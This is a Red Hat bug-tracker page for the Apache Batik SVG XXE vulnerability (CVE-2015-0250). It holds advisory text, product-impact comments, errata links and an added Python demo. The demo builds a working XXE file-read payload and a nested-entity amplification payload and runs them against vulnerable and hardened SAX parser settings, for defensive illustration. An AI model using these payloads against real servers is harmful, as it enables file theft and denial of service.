Bug 1203762 (CVE-2015-0250) - CVE-2015-0250 batik: XML External Entity (XXE) injection in SVG parsing
Summary: CVE-2015-0250 batik: XML External Entity (XXE) injection in SVG parsing
Keywords:
Status: CLOSED ERRATA
Alias: CVE-2015-0250
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Importance: medium (priority) / medium (severity)
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard:
Depends On: 1255840 1255833 1255834 1255835 1255836 1255837 1255838 1255839 1255841
Blocks: 1203763 1278997 1385169
Reported: 2015-03-19 15:52 UTC by Martin Prpič
Modified: 2019-09-29 13:30 UTC
CC List: 51 users

Fixed In Version: Batik 1.8, Batik 1.7.1, Batik 1.6.1
Doc Type: Bug Fix
Doc Text:
It was found that batik was vulnerable to XML External Entity attacks when parsing SVG files. A remote attacker able to send malicious SVG content to the affected server could use this flaw to read files accessible to the user running the application server, and potentially perform other more advanced XXE attacks.
Clone Of:
Environment:
Last Closed: 2019-06-08 02:40:17 UTC

Links
System | ID | Priority | Status | Summary | Last Updated
Red Hat Product Errata | RHSA-2015:2559 | normal | SHIPPED_LIVE | Critical: Red Hat JBoss BRMS 6.2.0 update | 2015-12-08 01:46:42 UTC
Red Hat Product Errata | RHSA-2015:2560 | normal | SHIPPED_LIVE | Critical: Red Hat JBoss BPM Suite 6.2.0 update | 2015-12-08 01:46:36 UTC
Red Hat Product Errata | RHSA-2016:0041 | normal | SHIPPED_LIVE | Moderate: Red Hat JBoss BRMS 6.1.5 update | 2016-01-14 23:34:50 UTC
Red Hat Product Errata | RHSA-2016:0042 | normal | SHIPPED_LIVE | Moderate: Red Hat JBoss BPM Suite 6.1.5 update | 2016-01-14 23:34:44 UTC

Description Martin Prpič 2015-03-19 15:52:24 UTC
The following flaw was found in Apache Batik:

Files lying on the filesystem of the server which uses batik can be revealed to arbitrary users who send maliciously formed SVG files. The file types that can be shown depend on the user context in which the exploitable application is running. If the user is root, a full compromise of the server, including confidential or sensitive files, would be possible.

XXE can also be used to attack the availability of the server via denial of service, as the references within an XML document can trivially trigger an amplification attack.

Additional information:

http://seclists.org/oss-sec/2015/q1/864

External References:

http://xmlgraphics.apache.org/security.html
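
The two attacks the description above names, external-entity file disclosure and entity-expansion amplification, run against a SAX parser in its vulnerable and hardened configurations. This is an added example and is not part of this bug report, of Batik, or of the upstream fix. Python's standard-library xml.sax (expat) stands in for the Java SAX parser Batik uses; xml.sax.handler.feature_external_ges is the same SAX feature URI, "http://xml.org/sax/features/external-general-entities". The "secret" file, both payloads, and the helper names (parse_svg, xxe_file_read_svg, amplification_svg, demo) are constructed for the demo, and a POSIX path layout is assumed for the file:// URL.

```python
"""Added example (not from this bug report or from Batik): XXE file read and
entity amplification against a SAX parser, vulnerable vs. hardened settings.
Python's stdlib xml.sax (expat) stands in for the Java SAX parser Batik uses.
The secret file and both payloads are constructed for the demo; POSIX paths
are assumed for the file:// URL."""
import io
import os
import tempfile
import xml.sax
from xml.sax import handler


class DoctypeRejected(Exception):
    """Raised by the hardened configuration when the SVG carries a DOCTYPE."""


class _TextCollector(handler.ContentHandler):
    """Collects every character-data chunk the parser hands the application."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


class _DoctypeBlocker:
    """Lexical handler: abort the parse as soon as a DOCTYPE (hence any DTD) appears."""

    def startDTD(self, name, public_id, system_id):
        raise DoctypeRejected("DOCTYPE not allowed in untrusted SVG: %r" % name)

    def endDTD(self):
        pass

    def startCDATA(self):
        pass

    def endCDATA(self):
        pass

    def comment(self, content):
        pass


def parse_svg(svg_bytes, resolve_external, allow_doctype=True):
    """Parse SVG bytes and return the text content the application would see.

    resolve_external=True  : external general entities are fetched and inlined,
                             the pre-fix behaviour the report describes.
    resolve_external=False : the SAX feature toggle a fix relies on.
    allow_doctype=False    : defence in depth; untrusted SVG never needs a DTD,
                             and refusing it also stops amplification.
    """
    parser = xml.sax.make_parser()
    collector = _TextCollector()
    parser.setContentHandler(collector)
    # feature_external_ges == "http://xml.org/sax/features/external-general-entities"
    parser.setFeature(handler.feature_external_ges, resolve_external)
    if not allow_doctype:
        parser.setProperty(handler.property_lexical_handler, _DoctypeBlocker())
    parser.parse(io.BytesIO(svg_bytes))
    return "".join(collector.chunks)


def xxe_file_read_svg(path):
    """Constructed payload: a <text> element that expands to a local file."""
    return (b'<?xml version="1.0"?>\n'
            b'<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file://' + path.encode() + b'"> ]>\n'
            b'<svg xmlns="http://www.w3.org/2000/svg"><text>&xxe;</text></svg>\n')


def amplification_svg(levels=3, fanout=10):
    """Constructed payload: nested internal entities, fanout**levels-fold expansion."""
    ents = ['<!ENTITY a0 "lol">']
    for i in range(1, levels + 1):
        ref = "&a%d;" % (i - 1)
        ents.append('<!ENTITY a%d "%s">' % (i, ref * fanout))
    doc = ('<?xml version="1.0"?>\n<!DOCTYPE svg [ %s ]>\n'
           '<svg xmlns="http://www.w3.org/2000/svg"><text>&a%d;</text></svg>\n'
           % (" ".join(ents), levels))
    return doc.encode()


def _rejects_doctype(svg_bytes):
    try:
        parse_svg(svg_bytes, resolve_external=False, allow_doctype=False)
    except DoctypeRejected:
        return True
    return False


def demo():
    """Run both payloads through each configuration and return what was observed."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "secret.txt")   # constructed; stands in for /etc/passwd
        with open(secret, "w") as f:
            f.write("db_password=hunter2")
        xxe = xxe_file_read_svg(secret)
        # Pre-fix: the file's contents arrive as document text.
        results["leaked"] = parse_svg(xxe, resolve_external=True)
        # Fixed: the entity reference is left unexpanded, nothing is read.
        results["no_external"] = parse_svg(xxe, resolve_external=False)
        # Defence in depth: the parse is aborted at the DOCTYPE.
        results["doctype_rejected"] = _rejects_doctype(xxe)

    bomb = amplification_svg(levels=3, fanout=10)
    # Disabling external entities alone does not stop internal-entity
    # amplification: 3 bytes of "lol" become 10**3 * 3 bytes of text ...
    results["amplified_len"] = len(parse_svg(bomb, resolve_external=False))
    # ... but refusing the DOCTYPE does.
    results["amplification_rejected"] = _rejects_doctype(bomb)
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print("%-24s %r" % (k, v))
```

Running the file prints the five observations: the vulnerable parse returns the secret file's contents, the parse with external general entities disabled returns an empty string, and the DOCTYPE-rejecting parse raises before any entity is declared. The amplification payload is the reason to do both: turning off external entities leaves internal entities alone, so the 3-byte entity still expands to 3000 bytes (larger fanout or depth grows it geometrically), while refusing a DOCTYPE in untrusted SVG removes the DTD that both attacks depend on.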

Comment 1 Tomas Hoger 2015-08-18 08:38:47 UTC
This issue was also fixed in upstream versions 1.7.1 and 1.6.1.

Upstream commit:

http://svn.apache.org/viewvc?view=revision&revision=1664335

Further details from one of the reporters acknowledged in the upstream advisory:

https://www.insinuator.net/2015/03/xxe-injection-in-apache-batik-library-cve-2015-0250/
https://www.ernw.de/download/apache_batik_xxe_advisory.txt

Comment 5 Jason Shepherd 2015-09-01 03:24:10 UTC
For JBoss Fuse, Apache Batik is used by the camel-fop component to render messages into SVG Image+XML. See:

   https://git-wip-us.apache.org/repos/asf?p=camel.git;a=blob;f=components/camel-fop/src/main/java/org/apache/camel/component/fop/FopProducer.java;h=d41b6d187cb7b5faf48fa3244c0b7d77ed204779;hb=e18459e53cf77514bb0fdfeceb423c456bbc4d9d

The vulnerability fixed an issue with the way SVG parses XML, not with the way it produces it. Therefore the issue doesn't affect JBoss Fuse 6.2.0. Add jboss/fuse=notaffected

Comment 6 Jason Shepherd 2015-09-01 04:02:05 UTC
For JBoss FSW, Apache Batik is used by BPEL Console, see:

   system/layers/soa/org/switchyard/component/bpel/main/module.xml

        <!-- Required by bpel2svg module -->
        <module name="org.apache.xmlgraphics" />

If we check the source code for BPEL (downstream Riftsaw), we see it doesn't use the patched SAXDocumentFactory; it uses DOMUtils to write an XML Document:

   https://github.com/riftsaw/riftsaw/blob/master/console/bpel2svg/src/main/java/org/wso2/carbon/bpel/ui/bpel2svg/impl/SVGImpl.java

Similar to JBoss Fuse, the SVG functionality is there for rendering XML, not for parsing it. Updating fsw-6/batik to notaffected.

Comment 9 errata-xmlrpc 2015-12-07 20:47:06 UTC
This issue has been addressed in the following products:

Red Hat JBoss BPM Suite 6.2.0

Via RHSA-2015:2560 https://rhn.redhat.com/errata/RHSA-2015-2560.html

Comment 10 errata-xmlrpc 2015-12-07 20:49:07 UTC
This issue has been addressed in the following products:

Red Hat JBoss BRMS 6.2.0

Via RHSA-2015:2559 https://rhn.redhat.com/errata/RHSA-2015-2559.html

Comment 11 errata-xmlrpc 2016-01-14 18:35:03 UTC
This issue has been addressed in the following products:

Red Hat JBoss BPM Suite 6.1.5

Via RHSA-2016:0042 https://rhn.redhat.com/errata/RHSA-2016-0042.html

Comment 12 errata-xmlrpc 2016-01-14 18:36:15 UTC
This issue has been addressed in the following products:

Red Hat JBoss BRMS 6.1.5

Via RHSA-2016:0041 https://rhn.redhat.com/errata/RHSA-2016-0041.html
